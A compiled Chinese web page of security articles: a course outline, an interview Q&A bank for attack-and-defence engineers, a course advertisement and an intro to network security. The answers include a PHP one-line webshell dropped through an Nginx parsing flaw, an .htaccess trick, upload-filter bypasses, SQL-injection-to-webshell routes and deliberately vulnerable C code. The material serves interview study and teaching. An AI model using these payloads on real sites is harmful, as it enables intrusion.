精华内容
下载资源
问答
  • 2020-08-14 12:29:58

    在这里插入图片描述

    安全攻防技能30讲 · 课程目录
    开篇词 (1讲)

    开篇词 | 别说你没被安全困扰过

    安全基础概念 (5讲)

    01 | 安全的本质:数据被窃取后,你能意识到问题来源吗?

    02 | 安全原则:我们应该如何上手解决安全问题?

    03 | 密码学基础:如何让你的密码变得“不可见”?

    04 | 身份认证:除了账号密码,我们还能怎么做身份认证?

    05 | 访问控制:如何选取一个合适的数据保护方案?

    Web安全 (7讲)

    06 | XSS:当你“被发送”了一条微博时,到底发生了什么?

    07 | SQL注入:明明设置了强密码,为什么还会被别人登录?

    08 | CSRF/SSRF:为什么避免了XSS,还是“被发送”了一条微博?

    09 | 反序列化漏洞:使用了编译型语言,为什么还是会被注入?

    10 | 信息泄露:为什么黑客会知道你的代码逻辑?

    11 | 插件漏洞:我的代码看起来很安全,为什么还会出现漏洞?

    12 | 权限提升和持久化:为什么漏洞修复了,黑客还是能够自由进出?

    Linux系统和应用安全 (5讲)

    13 | Linux系统安全:多人共用服务器,如何防止别人干“坏事”?

    14 | 网络安全:和别人共用Wi-Fi时,你的信息会被窃取吗?

    15 | Docker安全:在虚拟的环境中,就不用考虑安全了吗?

    16 | 数据库安全:数据库中的数据是如何被黑客拖取的?

    17 | 分布式安全:上百个分布式节点,不会出现“内奸”吗?

    安全防御工具 (7讲)

    18 | 安全标准和框架:怎样依“葫芦”画出好“瓢”?

    19 | 防火墙:如何和黑客“划清界限”?

    20 | WAF:如何为漏洞百出的Web应用保驾护航?

    21 | IDS:当黑客绕过了防火墙,你该如何发现?

    22 | RASP:写规则写得烦了?尝试一下更底层的IDS

    23 | SIEM:一个人管理好几个安全工具,如何高效运营?

    24 | SDL:怎样才能写出更“安全”的代码?

    业务安全 (6讲)

    25 | 业务安全体系:对比基础安全,业务安全有哪些不同?

    26 | 产品安全方案:如何降低业务对黑灰产的诱惑?

    27 | 风控系统:如何从海量业务数据中,挖掘黑灰产?

    28 | 机器学习:如何教会机器识别黑灰产?

    29 | 设备指纹:面对各种虚拟设备,如何进行对抗?

    30 | 安全运营:“黑灰产”打了又来,如何正确处置?

    知识串讲 (3讲)

    31 | Web安全:如何评估用户数据和资产数据面临的威胁?

    32 | Linux系统和应用安全:如何大范围提高平台安全性?

    33 | 安全防御工具:如何选择和规划公司的安全防御体系?

    特别加餐 (5讲)

    34 | 数据安全:如何防止内部员工泄露商业机密?

    35 | 前端安全:如何打造一个可信的前端环境?

    36 | 职业发展:应聘安全工程师,我需要注意什么?

    37 | 个人成长:学习安全,哪些资源我必须要知道?

    38 | 安全新技术:IoT、IPv6、区块链中的安全新问题

    结束语 (2讲)

    结束语 | 在与黑客的战役中,我们都是盟友!

    结课测试|这些安全知识,你都掌握了吗?

    安全攻防技能

    更多相关内容
  • 深信服安全攻防工程师笔试题库

    千次阅读 2021-12-15 10:10:59
    修复方式:筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer (3)XXE是XML外部实体注入攻击,XML中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感...

    1、某系统存在防注入模块,注入时会被提示:

    如何利用这个防注入系统拿shell?

    既然回显IP,就可以在URL里面直接提交一句话, 可以尝试一句话?eval($_post["a"]);这样网站就把一句话也记录进数据库文件了。这个时候可以尝试寻找网站的配置文件,直接上菜刀链接。也可以尝试burp抓包进行http头部注入(X-fowarded-for字段注入)。


    2、 发现test.jsp?id=1234 注入点,你有哪几种思路获取 webshell,哪种是优选?

    (1)有root权限以及写文件的权限,可以构造联合查询语句使用using INTO OUTFILE,可以将查询的输出重定向到系统的文件中,这样去写入WebShell 
    (2)使用sqlmap –os-shell,原理和上面一种相同,来直接获得一个 Shell,这样效率更高 
    (3)通过构造联合查询语句得到网站管理员的账户和密码,然后扫后台登录后台,再在后台通过改包上传等方法上传Shell


    3、CSRF 和 XSS 和 XXE 有什么区别,以及修复方式? 

    (1)XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。修复方式:对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。 
    (2)CSRF是跨站请求伪造攻击,XSS是实现CSRF的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。修复方式:筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer 
    (3)XXE是XML外部实体注入攻击,XML中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。修复方式:XML解析库在调用时严格禁止对外部实体的解析,过滤掉system等关键词,过滤掉用户提交的XML数据


    4、写出病毒木马常用的hook技术以及大致实现。

    (1)INLINE HOOK将需要hook的api函数入口的部分代码修改为跳转代码,如将函数的       序言代码push ebp;mov ebp,esp等代码修改为jmp hook_func的指令

    (2)IAT HOOK遍历可执行程序的导入表,并修改导入表的地址为要跳转的函数地址

    (3)消息hook机制 利用setwindowshook函数配合全局参数劫持windows下的消息传递,利用callnexthookex将消息进行下一步的分发。通常该技术用来进行dll注入。

    (4)SSDT hook在内核层上通过KeServiceDescriptorTable内核导出变量来获取对应的ssdt表地址,接着查询需要hook的内核api的索引,将ssdt表对应索引的函数地址改为需要跳转的函数地址。


    5、请尽可能列举你知道的网站未能正确使用图片验证码机制的情况,以及如何绕过其限制?

    (1)图形验证码的内容可OCR识别

    (2)多阶段的过程,先校验验证码,成功之后的下一步不需要验证码,可以直接抓包,跳过第一步的验证

    (3)验证码在服务段校验后,没有立即失效,需要客户端再次请求才会更新,只要客户端不再请求验证码即可使用原来的验证码

    (4)生成验证码的模块是否根据提供的参数生成验证码,如果是说明存在漏洞

    (5)有些验证码与数据包中的某个参数绑定,比如cookie中的某个属性,只要它们相匹配,验证码就认为是有效的。这种机制存在漏洞。

    (6)在某些情况下,验证码隐藏在HTML源码或通过其他方式获得“明文”

    (7)在服务器端,是否只有在验证码检验通过后才进行用户名和密码的检验,如果不是说明存在漏洞。


    6、请尽可能列举你知道的网站未能安全实现文件上传功能的情况,以及如何绕过其限制?

    (1)

    ●允许直接上传脚本文件:php、jsp、aspx

    ●结合web server解析漏洞:IIS 5.x/6.0解析漏洞、IIS 6.0解析利用方法有两种:目录解析 /xx.asp/xx.jpg和文件解析abc.asp;.jpg、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞、Nginx <8.03 空字节代码执行漏洞、Apache解析漏洞

    ●其他:

    A.在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。

    B.如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

    <FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>

    然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。

    (2)绕过方法:

    ●firebug禁用javascript,firebug修改允许上传类型

    ●Burp绕过限制

    ●本地构造html代码

    ●后端检测-MIME,修改MIME类型;后端检测-文件头,jpg图片;后端检测-文件扩展名,黑名单与白名单、大小写、寻找黑白名单的遗漏点配合解析漏洞来绕过、%00和\x00截断

    ●文件内容绕过:图片马、加密webshell、填充垃圾数据


    7、利用汇编语言编写一道程序,不使用乘法以及除法指令,计算(((AX*5)+300h)/2-100h)*8的值。

    mov bx,ax

    shl ax,2

    add ax,bx

    add ax,300h

    shr ax,1

    sub ax,100h

    shl ax,3


    8、阅读如下代码,其中main函数参数可以被攻击者控制,那么main函数中存在哪些漏洞,指出漏洞具体位置及问题,并说明这些代码中漏洞的修复方法

    //读取指定的文件中的内容并返回该文件base64编码后的内容,函数失败则返回NULL,在非NULL情况下需要调用该函数后手动释放内存,该函数中不存在安全性问题
    char *readBase64File(char *fileName);
    int main(int argc, char* argv[])
    {
        char filePath[260];
        char fileCmd[512];
        char *fileName;
        int dirIdx;
        char *fileContent;
        char *dirPaths[4];
        dirPaths[0] = ”/home/data1/”;
        dirPaths[1] = ”/home/data2/”;
        dirPaths[2] = ”/home/data3/”;
        dirPaths[3] = ”/home/data4/”;
        fileName = argv[1];
        dirIdx = atoi(argv[2]);
        if (dirIdx > 3)
        { 
           printf(“file index error!\n”);
           return -1;
        }
        strcpy(filePath, dirPaths[dirIdx]);
        if (strlen(filePath) + strlen(fileName) < 260)
            strcat(filePath, fileName);
        else
            return -1;
        fileContent = readBase64File(filePath);
        if (fileContent == NULL)
        {
            printf(“read filecontent error!\n”);
        }
        else 
        {
            printf(“file content is: %s\n”, fileContent);
            free(fileContents);
        }
        strcpy(fileCmd, “rm ”);
        strcat(fileCmd, fileName);
        printf(fileCmd);
        system(fileCmd);
        return 0;
    } 

    命令执行,目录穿越,缓冲区溢出,数组越界访问,格式化字符串

    (1)system(fileCmd);处存在命令执行漏洞及任意文件删除问题,需要进行命令执行过滤

    (2)printf(fileCmd);处存在格式化字符串漏洞,此处可以通过%s来打印命令

    (3)fileContent =readBase64File(filePath);处存在目录穿越,任意文件读取漏洞,此处可以对../这种目录穿越特征进行过滤

    (4)strcpy(filePath, dirPaths[dirIdx]);处存在数组访问越界,从而可以也可以导致缓冲区溢出问题,判断有符号数的dirIdx时需要判断其大于等于0


    9、CSRF、SSRF和重放攻击有什么区别?

    CSRF是跨站请求伪造攻击,由客户端发起 
    SSRF是服务器端请求伪造,由服务器发起 
    重放攻击是将截获的数据包进行重放,达到身份认证等目的


    10、 mysql的网站注入,5.0以上和5.0以下有什么区别?

    5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。

    5.0以下是多用户单操作,5.0以上是多用户多操作。


    11、无论是在日常的网络维护,还是在渗透测试过程中,经常会使用到端口转发、代理、隧道技术,请详尽地说明这三种技术的异同点。

    端口转发,就是指访问某一IP和端口的流量会被转发到另一个IP和端口,通过中转的方式,来访问无法直接访问到的主机和服务。

    代理和隧道本质上都是一种端口转发技术。代理的特点是代理服务端可以根据客户端的数据包,自动判断向哪个目标机器转发;隧道技术主要是对端口转发的流量进行了加密和封装的处理。


    12、将下列汇编代码逆成等价的C代码。

    func1:                
                    push    ebp
                    mov     ebp, esp
                    sub     esp, 14h
                    push    esi
                    mov     eax, 4
                    imul    ecx, eax, 0
                    mov     edx, [ebp+0Ch]
                    mov     eax, [edx+ecx]
                    mov     [ebp-8], eax
                    mov     ecx, 4
                    shl     ecx, 0
                    mov     edx, [ebp+0Ch]
                    mov     eax, [edx+ecx]
                    mov     [ebp-0Ch], eax
                    mov     [ebp-14h], 61C88647h
                    mov     [ebp-4], 0C6EF3720h
                    mov     [ebp-10h], 0
                    jmp     short loc_401369
    loc_401360:                            
                    mov     ecx, [ebp-10h]
                    add     ecx, 1
                    mov     [ebp-10h], ecx
    loc_401369:                            
                    mov     edx, [ebp-10h]
                    cmp     edx, [ebp+8]
                    jnb     short loc_4013D3
                    mov     eax, [ebp-8]
                    shl     eax, 5
                    mov     ecx, [ebp-8]
                    shr     ecx, 4
                    xor     eax, ecx
                    add     eax, [ebp-8]
                    mov     edx, [ebp-4]
                    shr     edx, 0Bh
                    and     edx, 3
                    mov     ecx, [ebp+10h]
                    mov     esi, [ebp-4]
                    add     esi, [ecx+edx*4]
                    xor     eax, esi
                    mov     edx, [ebp-0Ch]
                    sub     edx, eax
                    mov     [ebp-0Ch], edx
                    mov     eax, [ebp-4]
                    add     eax, [ebp-14h]
                    mov     [ebp-4], eax
                    mov     ecx, [ebp-0Ch]
                    shl     ecx, 5
                    mov     edx, [ebp-0Ch]
                    shr     edx, 4
                    xor     ecx, edx
                    add     ecx, [ebp-0Ch]
                    mov     eax, [ebp-4]
                    and     eax, 3
                    mov     edx, [ebp+10h]
                    mov     esi, [ebp-4]
                    add     esi, [edx+eax*4]
                    xor     ecx, esi
                    mov     eax, [ebp-8]
                    sub     eax, ecx
                    mov     [ebp-8], eax
                    jmp     short loc_401360
    loc_4013D3:                            
                    mov     ecx, 4
                    imul    edx, ecx, 0
                    mov     eax, [ebp+0Ch]
                    mov     ecx, [ebp-8]
                    mov     [eax+edx], ecx
                    mov     edx, 4
                    shl     edx, 0
                    mov     eax, [ebp+0Ch]
                    mov     ecx, [ebp-0Ch
                    mov     [eax+edx], ecx
                    pop     esi
                    mov     esp, eb
                    pop     eb
                    retn
                    endp
    func1(1,2,3) 
    func1(int a,int b,int c)
    {
       int var1,var2,var3;
       var1 = *b;
       var2 = *(b+4);
       var3 = 0xC6EF3720;
       for (int i =0;i<a;i++)
       {
         var2 -=(*(DWORD*)(c+4*((var3>>11)&3))+var3)^(var1+((var1>>4)^(var1<<5)));
         var3 +=0x61c88647;
         var1-=(*(DWORD*)(c+4*(var3&3))+var3)^(var2+((var2>>4)^(var2<<5)));
       }
       *(DWORD*)b = var1;
       *(DWORD*)(b+4) = var2;
       return b;
    } 

    13、以下为汇编码的两个函数func和reverse,分析这两个函数并编写等价的C代码函数

    func:
            mov     ecx, eax
            lea     edx, [ecx+1]
    loop:
            mov     al, [ecx]
            inc     ecx
            test    al, al
            jnz     loop
            sub     ecx, edx
            mov     eax, ecx
            ret
    reverse:
            mov     ebp, eax ;eax为输入的参数1
            mov     edi, edx ;edx为输入的参数2
            mov     esi, ebx ;ebx为输入的参数3
            mov     eax, ebp
            call    func
            push    eax
            xor     ebx, ebx
            xor     ecx, ecx
            xor     ebp, ebp
            jmp     label4
    
    label1:
            lea     eax, [ebp*4]
            add     eax, edi
            mov     eax, [eax]
            cmp     eax, ecx
            jbe     label2
            mov     ebx, ecx
            mov     ecx, eax
            jmp     label3
    label2:
            cmp     eax, ebx
            jbe     label3
            mov     ebx, eax
    label3:
            inc     ebp
    label4:
            cmp     ebp, esi
            jb      label1
            pop     eax
            add     eax, ebx
            add     eax, ecx
            ret
    
    int mystrLen(char *str)
    {
        char *pstr = str+1;
        while( *str++ );
        return str - pstr;
    }
    int reverse(char *str, unsigned int numArr[], unsigned int numLen)
    {
        int len;
        int i;
        unsigned int big1,big2;
        len = mystrLen(str);
        big1 = 0;
        big2 = 0;
        for (i = 0; i < numLen; i++)
        {
            if (numArr[i] > big1){
                big2 = big1;
                big1 = numArr[i];
            }
            else if (numArr[i] > big2){
                big2 = numArr[i];
            }
        }
        return len + big1 + big2;
    } 

    14、请回答如下端口默认对应的服务,以及在渗透测试过程中我们可以从哪些角度考虑其安全问题。端口:21、22、873、1433、3306、6379、11211

    端口服务说明
    21FTP匿名访问\弱口令
    22SSH弱口令
    873rsync未授权访问\弱口令
    1433mssql弱口令
    3306mysql弱口令
    6379redis一般无验证,直接访问
    11211memcache内存泄露\未授权访问

    15、登录一个应用程序后,服务器建立以下cookie:

    1
    Set-cookie: sess=abcd1129efgh;

    单击“退出”按钮后,应用程序执行以下客户端脚本:

    1
    2
    document.cookie=”sess=”;
    document.location=”/”

    通过这种行为,可以得出什么结论?

    • 退出功能存在缺陷。
    • 上述脚本使浏览器中当前保存的会话令牌失效,也就是说,随后的任何请求将不会提交之前的令牌值。然后,该脚本将启动一个指向应用程序起始页面的重定向。任何访问受保护功能的尝试将遭到拒绝,因为相关请求并不属于通过验证的会话的一部分。
    • 客户端应用程序并未将已执行了退出操作这一信息传达给服务器。服务器上的用户会话将仍处于活动状态,如果将之前发布的令牌提交给服务器,服务器将继续接受该令牌。在会话超时或以其他方式被清楚之前,这种情况会一直持续。在这段时间内,已通过某种方式截获或猜测出令牌值的攻击者就可以继续使用令牌来劫持用户会话。

    16、简述一下SOCKS协议TCP穿透原理

    • 客户端(需要代理方)向SOCKS服务器(代理方)发出代理请求信息
    • SOCKS代理服务器应答
    • 客户端接到应答后向SOCKS服务器发送目的IP和端口
    • SOCKS服务器与目的IP、端口建立TCP连接,并向客户端应答可以代理
    • SOCKS服务器将客户端发出的信息传到目的方,将目的方发出的信息传到客户端,代理完成

    17、简述一下利用SQL注入漏洞拖取数据的过程

    • 收集应用程序的可测试点
    • 确定可测试点是否是可注入点
    • 数据库类型探测
    • 数据库基本信息探测,包括当前数据库用户名、当前用户名权限、数据库表信息(几个表、几个列、表名称、列名称)
    • 利用漏洞爆取数据(明注入、盲注入)

    18、用C语言分别编写含有以下漏洞的函数:

    (1)通过函数的输入参数可控的缓冲区溢出漏洞的函数,以及对应的修复该漏洞的函数

    (2)通过函数的输入参数可控的整数溢出漏洞的函数,以及对应的修复该漏洞的函数

    样例:

    //含有格式化字符串漏洞函数:
    void format_vul(char *outstr){
        printf(outstr);
    }
    //格式化字符串漏洞的修复函数:
    void format_vul(char *outstr){
        printf("%s", outstr);
    }
    //缓冲区溢出漏洞函数:
    void buffer_vul(char *buf){
        char str[20];
        strcpy(str, buf);
    }
    //缓冲区溢出漏洞修复:
    void buffer_vul(char *buf){
        char str[20];
        if (strlen(buf) >= 20)
            return;
        strcpy(str, buf);
    }
    //整数溢出漏洞函数:
    void int_vul(int idx, int type){
        int arr[8];
        if (idx >= 8)
            return;
        arr[idx] = type;
    }
    //整数溢出漏洞修复:
    void int_vul(int idx, int type){
        int arr[8];
        if (idx >= 8 || idx < 0)
            return;
        arr[idx] = type;
    }
    

    19、谈谈在WEB类安全问题的应急处置过程中web日志溯源攻击路径的思路?

    在对WEB日志进行安全分析时,可以按照下面两种思路展开,逐步深入,还原整个攻击过程。

    首先确定受到攻击的时间范围,以此为线索,查找这个时间范围内可疑的日志,根据可疑ip、攻击特征等进一步排查(WEB日志会记录客户端对WEB应用的访问请求,这其中包括正常用户的访问请求和攻击者的恶意行为。通过大量的分析,我们发现攻击者在对网站入侵时,向网站发起的请求中会带有特定的攻击特征,如利用WEB扫描器在对网站进行漏洞扫描时往往会产生大量的404错误日志,当有攻击者对网站进行SQL注入漏洞探测时,WEB访问日志中通常会出现and 1=1等字样),最终锁定攻击者,确认攻击的手段,还原攻击过程。参考下图。


     20、心脏滴血漏洞产生的原因,危害都有哪些?

    Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。通过读取网络服务器内存,攻击者可以访问敏感数据,从而危及服务器及用户的安全。敏感的安全数据,如服务器的专用主密钥,可使攻击者在服务器和客户端未使用完全正向保密时,通过被动中间人攻击解密当前的或已存储的传输数据,或在通信方使用完全正向保密的情况下,发动主动中间人攻击。攻击者无法控制服务器返回的数据,因为服务器会响应随机的内存块。
    漏洞还可能暴露其他用户的敏感请求和响应,包括用户任何形式的POST请求数据,会话cookie和密码,这能使攻击者可以劫持其他用户的服务身份。漏洞让特定版本的openSSL成为无需钥匙即可开启的“废锁”,入侵者每次可以翻检户主的64K信息,只要有足够的耐心和时间,就可以翻检足够多的数据,拼凑出户主的银行密码、私信等敏感数据。


    21、Apache,IIS,Nginx的文件解析漏洞都是如何解析和利用的?

    (1)Apache解析漏洞。

    它是从右到左开始判断解析,如果为不可识别解析,就再往左判断.比如upupimage.php.owf.rar “.owf”和”.rar”?这两种后缀是apache不可识别解析,apache就会把upupimage.php.owf.rar解析成php.

    (2)IIS解析漏洞

    ●IIS5.x/6.0中的/xx.asp/xx.jpg ,网站下建立文件夹的名字为.asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。
    ●123.asp;.jpg会被服务器看成是123.asp,IIS6.0 默认的可执行文件除了asp还包含这三种/upupimage.asa/upupimage.cer /upupimage.cdx 
    (3)nginx解析漏洞

    ●nginx默认Fast-CGI开启状况下,黑阔上传一个名字为upupimage.jpg,内容为<?PHPfputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>的文件,然后访问upupimage.jpg/.php,在这个目录下就会生成一句话木马 shell.php。
    ●Nginx在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码,影响版:0.5.,0.6.,0.7 <= 0.7.65, 0.8 <= 0.8.37


    22、从哪些方面可以进行CSRF漏洞防御?

    CSRF漏洞防御主要可以从三个层面进行,即服务端的防御、用户端的防御和安全设备的防御。
    (1)检测HTTPreferer 字段同域。根据HTTP协议,在HTTP头中有一个字段叫Referer,它记录了该HTTP请求的来源地址。在通常情况下,访问一个安全受限页面的请求必须来自于同一个网站。比如某银行的转账是通过用户访问http://bank.test/test?page=10&userID=101&money=10000页面完成,用户必须先登录bank.test,然后通过点击页面上的按钮来触发转账事件。当用户提交请求时,该转账请求的Referer值就会是转账按钮所在页面的URL(本例中,通常是以bank. test域名开头的地址)。而如果攻击者要对银行网站实施CSRF攻击,他只能在自己的网站构造请求,当用户通过攻击者的网站发送请求到银行时,该请求的Referer是指向攻击者的网站。因此,要防御CSRF攻击,银行网站只需要对于每一个转账请求验证其Referer值,如果是以bank. test开头的域名,则说明该请求是来自银行网站自己的请求,是合法的。如果Referer是其他网站的话,就有可能是CSRF攻击,则拒绝该请求
    (2)限制sessioncookie的生命周期。CSRF攻击是有条件的,当用户访问恶意链接时,认证的cookie仍然有效,所以当用户关闭页面时要及时清除认证cookie
    (3)使用验证码。虽然攻击者已经通过获取cookie得到用户的身份,但是通过在你的表单中包括验证码,事实上网站已经消除了跨站请求伪造攻击的风险。可以在任何需要执行操作的任何表单中使用这个流程。
    (4)cookie关键字段设置HttpOnly属性。可以在一定程度防御CSRF。

    展开全文
  • 面对不可逆的安全问题,只有多加防范、熟悉安全攻防技术,才有化危为安的可能。 我的一位老友,他是资深安全工程师,他曾在《黑客防线》《黑客手册》等著名杂志发表过多篇文章,常年混迹于各大 SRC 平台以及 ...

    最近,PDD 被爆出玩“全额返现”的文字游戏欺骗消费者,起初我以为是产生 Bug 而找的借口,后来一看有点“海参炒面”的意思。

    突然想到去年年初,PDD 被薅羊毛的 bug,用户可以随意领取 100 元无门槛优惠券,且全场通用(特殊商品除外),有效期一年。

    PDD的官方回应是:黑灰产团伙利用平台漏洞进行不正当牟利,公司已第一时间修复漏洞并向公安机关报案。也就是 PDD 平台大又有钱,换做其他小平台,都有可能一夜倒闭。       

     

    因系统漏洞被消费者“薅羊毛”的事件这并不是第一起。同为电商平台的京东、苏宁、淘宝都出现类似的优惠券发放漏洞,腾讯视频也曾出过“ 0.2 元开通 VIP ”的系统漏洞,他们都只能为安全漏洞买单。

    万物皆互联,处处皆风险

    万物互联时代,从手机到智能家具、到智能汽车,衣食住行都会有越来越多的未知漏洞将会被利用。

    红衣教主周鸿祎曾经说过:网络安全之所以频繁出现,是因为很多漏洞都是人为的产生,除了人作为技术程序员写代码留下的漏洞之外,很多人不遵守安全的规定,违背安全的政策,从而给组织、机构、网络带来很多风险。

    我十分认同这句话,不论你是后端还是前端,都应该意识到安全与整个开发团队成员都有关。面对不可逆的安全问题,只有多加防范、熟悉安全攻防技术,才有化危为安的可能。

    我的一位老友,他是资深安全工程师,他曾在《黑客防线》《黑客手册》等著名杂志发表过多篇文章,常年混迹于各大 SRC 平台以及 HackerOne 漏洞奖励平台。

    如今,他想把自己这些丰富的经验,都分享给你。

    于是在拉勾教育上线了「Web 安全攻防之道」的专栏,带你深入实战场景,掌握 Web 攻防技巧。

    上线首日有拉勾教育的学费补贴只要 1 元,就可永久解锁。(仅限24小时,周六就要涨价了)       

    微软全球最具价值安全研究员

    讲师叫赢少良是资深安全工程师,现就职于某世界 500 强知名企业,微软全球最具价值安全研究员,曾获得国内外各大知名厂商的漏洞致谢,包括 Mcicrosoft、Google、Apple、Adobe、阿里、百度等。

    曾在《黑客防线》《黑客手册》等著名杂志发表过多篇文章,常年混迹于各大 SRC 平台以及 HackerOne 漏洞奖励平台,擅长领域涉及 Android/Windows/macOS/Web 安全。

    Web 安全最受外部黑客关注

    根据 HackerOne 的报告数据,71% 的安全问题都出现在网站上,其次是一些 API 接口,而这些接口很大一部分都来自 Web 。所以 Web 安全是最受外部黑客关注的目标,也是应该重点防御的对象。

    本专栏共 3 个模块,通过理论分析、工具和方法论介绍、案例实战带你全面体系的了解 Web 安全,建立完整的 Web 安全知识体系。

    模块一:Web 攻防基础:

    这是正式开始前的准备工作,主要介绍了一些常用的工具,带你搭建靶场进行演练,避免非法测试他人网站。

    通过这一部分的学习,你可以掌握一些常用的渗透工具和信息收集的方法,学会搭建靶场,帮助你提高测试效率和成功率,更好地理解漏洞的产生原理和利用,提高实战能力。

    模块二:漏洞攻防案例:

    作为这门课最硬核的部分,在模块一的基础上,补充了一些实用的工具和测试方法(例如sqlmap 的使用),讲解了各种常见的 Web 漏洞攻防原理,教你如何进行安全测试,并搭建靶场进行演练。通过这一部分的学习,你可以掌握 XSS、SQL 注入、CSRF 等常见 Web 漏洞类型的攻击与防御方法。

    模块三:Web 安全建设:

    这里介绍的是企业内部对于 Web 安全漏洞的防御方法,如何更系统、更全面、更早地检测、修复、拦截各种漏洞,防止企业产品遭受外部利用漏洞进行恶意攻击是这一模块的重点。通过这一部分的学习,你可以保障自己业务产品的正常运行,若是被攻击入侵,也能拥有修复漏洞和应急处置的能力。

    以下是课程大纲,一定对你很有帮助    

    ⚠️⚠️⚠️ 最后再次提醒

    上线首日仅需1元,就可永久解锁

    仅限24小时,周六就涨价!

    (这样良心的专栏,不囤我都替你感到亏)       

      

    另外,这个课是有配套的学习资料的,点击【阅读原文】领取!

    展开全文
  • 一篇很不错的安全攻防技术文章,主要介绍SQL注入的原理,危害和如何有效防范。
  • 网络安全--安全攻防概述

    千次阅读 2021-08-18 18:27:21
    课程目标:这节课我们来介绍安全攻防以及信息安全的职业发展历程,去了解什么是安全攻防以及安全攻防的基本概念,攻击和防御的由来。 任务目标:通过对这节课的学习,能够对安全攻防有进一步的了解和认识,掌握安全...

    目录

    一、安全攻防简介

    1.1安全攻防介绍

    1.2网络安全概述

    1.3网络攻击:

    1.4安全防御

    二、信息安全发展历程

    2.1信息安全发展简介

    2.2信息安全发展历程

    三、信息安全职业发展方向

    3.1信息安全职业前景

    3.2信息安全职业发展方向


    课程目标:这节课我们来介绍安全攻防以及信息安全的职业发展历程,去了解什么是安全攻防以及安全攻防的基本概念,攻击和防御的由来。

    任务目标:通过对这节课的学习,能够对安全攻防有进一步的了解和认识,掌握安全攻防基本概念,了解信息安全的发展历程和职业发展方向。

    一、安全攻防简介

    1.1安全攻防介绍

    攻防即攻击基本原理与防范技术。攻击是指利用网络存在的漏洞和安全缺陷对网络系统的硬件、软件及其系统中的数据进行的攻击。安全攻防是网络中攻击和防御的总称。

    针对每一种威胁或存在的漏洞做出相应的攻击与防御,如扫描与防御技术、网络嗅探及防御技术、口令破解与防御、Web攻击与防御、缓冲区溢出攻击与防御等。

    网络攻击防御体系

    从系统安全的角度可以把网络安全的研究内容分为两大体系网络攻击网络防御

    1.2网络安全概述

    网络安全概念:

    网络的安全是指通过采用各种技术和管理措施,使网络系统正常运行,从而确保网络数据的可用性、完整性和保密性。网络安全的具体含义会随着“角度”的变化而变化。比如:从用户(个人、企业等)的角度来说,他们希望设计个人隐私或商业利益的信息在网络上传输时受到机密性、完整性和真实性的保护。

    网络安全目标:

    网络安全的最终目标是通过各种技术与管理手段实现网络信息系统的机密性、完整性、可用性、可靠性、可控性和拒绝否认性,其中前三项时网络安全的基本属性。

    网络安全特性:

    • 保密性:信息不泄露给非授权用户、实体或过程,或供其利用的特性。
    • 完整性:数据未经授权不能进行改变的特性,即信息或存储或传输过程中保持不被修改、不被破坏和丢失的特性
    • 可用性:可被授权实体访问并按需求使用的特性。即当需要时能否对存取所需的信息。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于可用性的攻击;
    • 可控性:对信息的传播及内容具有控制能力。
    • 可审查性(不可否认性/拒绝否认性或不可抵赖性):出现安全问题时提供的依据与手段。

    1.3网络攻击:

    网络攻击是利用网络存在的漏洞和安全缺陷对网络系统的硬件、软件及其系统中的数据进行的攻击。主要分为主动攻击被动攻击。如:

    主动攻击:

    主动攻击会导致某些数据流的篡改和虚假数据流的产生。

    这类攻击进一步可分为篡改、伪造信息数据和终端(拒绝服务)

    篡改:更改报文流包括对通过连接的PDU的真实性、完整性和有序性的攻击

    拒绝服务:拒绝服务指攻击者向因特网上的服务器不停地发送大量分组,使因特网或服务器无法正常提供正常服务。

    伪造:伪造连接初始化,攻击者重放以前已被记录的合法连接初始化序列,或者伪造身份而企图建立连接

    被动攻击:

    被动攻击中攻击者不对数据信息做任何修改,攻击者只是观察和分析某一个协议数据单元PDU而不干扰信息流。

    截取/窃听是指在未经用户同意和认可的情况下攻击者获得了信息或相关数据。通常包括窃听、流量分析、破解弱加密的数据流等攻击方式。攻击方法有口令入侵、特洛伊木马、电子邮件、节点攻击、网络监听、黑客软件、安全漏洞、端口扫描等攻击方法。

    1.4安全防御

    为了抵御网络威胁,并能及时发现网络攻击线索,修补有关漏洞,记录、审计网络访问日志,以尽可能地保护网络环境安全,可采用以下安全防御技术。

    防火墙

    防火墙由服务访问规则、验证工具、包过滤和应用网关这四个部分组成,是一种较早使用、实用性很强的网络安全防御技术,它阻挡对网络的非法访问和不安全数据的传递,使得本地系统和网路免于受到许多网络安全威胁。在网络安全中,防火墙主要用于逻辑隔离外部网络与受保护的内部网络。

    防火墙主要是实现网络安全的安全策略,而这种策略是预先定义好的,所以是一种静态安全技术。在策略中涉及的网络访问行为可以实施有效管理,而策略之外的网络访问行为则无法控制。防火墙的安全策略由安全规则表示。

    入侵检测防护

